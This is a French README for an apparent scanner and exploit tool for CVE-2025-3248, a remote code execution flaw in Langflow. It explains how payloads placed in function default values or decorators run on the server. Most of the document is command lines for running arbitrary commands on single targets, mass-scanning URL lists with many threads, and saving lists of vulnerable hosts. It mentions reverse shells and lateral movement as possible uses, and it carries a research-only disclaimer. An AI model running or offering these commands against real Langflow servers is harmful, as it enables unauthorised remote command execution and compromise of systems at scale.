
Langflow, lors de l'analyse et de la compilation AST du « code de vérification » soumis par l'utilisateur, appelle les fonctions Python `compile()`/`exec()` sans authentification ni restriction de sandbox (et évalue également les paramètres par défaut des fonctions et les décorateurs pendant la phase de compilation). Un attaquant peut placer une charge utile malveillante dans les valeurs par défaut des paramètres ou dans les décorateurs, et ainsi exécuter des instructions arbitraires dans le contexte du serveur (reverse shell, téléchargeurs, mouvement latéral, etc.).
Un outil Python pour scanner et exploiter la vulnérabilité CVE-2025-3248, qui permet l'exécution de code à distance (RCE) dans les applications Langflow.
pip install requests
python cve-2025-3248.py http://target:port
python cve-2025-3248.py http://target:port -c "id"
python cve-2025-3248.py -f urls.txt
python cve-2025-3248.py -f urls.txt -c "whoami"
python cve-2025-3248.py -f urls.txt -t 20 --timeout 15 -v
url: URL cible (par exemple: http://10.10.10.1:7860)-f, --file: Fichier contenant la liste des URL, une URL par ligne-c, --cmd: Commande à exécuter (par exemple: id, whoami)--timeout: Délai d'expiration des requêtes, 10 secondes par défaut-t, --threads: Nombre de threads pour le scan par lot, 10 par défaut-v, --verbose: Mode verbeux, affiche les réponses brutespython cve-2025-3248.py http://192.168.1.100:7860
python cve-2025-3248.py http://192.168.1.100:7860 -c "ls -la"
Créez le fichier targets.txt:
http://192.168.1.100:7860
http://192.168.1.101:7860
http://192.168.1.102:7860
Puis exécutez:
python cve-2025-3248.py -f targets.txt
python cve-2025-3248.py -f targets.txt -c "uname -a" -t 5
[+] Exécution réussie[-] Échec ou erreur[!] Message d'avertissement[*] Sortie d'informationLes cibles scannées avec succès sont enregistrées dans le fichier vulnerable_targets.txt ou vulnerable_targets_{command}.txt.
Cet outil est destiné uniquement à la recherche en sécurité et à des fins éducatives. L'utilisateur est responsable de son utilisation. Tester des systèmes sans autorisation peut enfreindre les lois et réglementations.